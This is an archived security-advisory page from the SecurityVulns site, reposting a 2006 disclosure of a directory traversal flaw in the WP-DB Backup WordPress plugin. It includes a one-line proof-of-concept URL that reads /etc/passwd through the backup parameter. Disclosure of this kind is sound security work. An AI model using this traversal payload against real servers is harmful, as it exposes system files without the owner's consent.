Информационная безопасность
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21442] Invision Power Board Threaded View Mode Security Bypass

  BlaBla 4U XSS Vulnerabilite

  Virtual War v1.5.0 SQL injection and XSS

  Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities

From:ssteam.pl_(at)_gmail.com <ssteam.pl_(at)_gmail.com>
Date:15 августа 2006 г.
Subject:Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability

Hi all,

Software: WP-DB Backup Plugin for Wordpress

Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/

Description:
WP-DB Backup is vulnerable to directory traversal attack.
You must have administrator rights in the wordpress blog to exploit
this vulnerability.

PoC:
http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup=../..
/../../../etc/passwd

Credits:
marc & shb from ssteam are credited with discoverying this vulnerability.

Vendor:
not contacted.

--
Coolest IT security blog: http://ssteam.ath.cx

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 



Rating@Mail.ru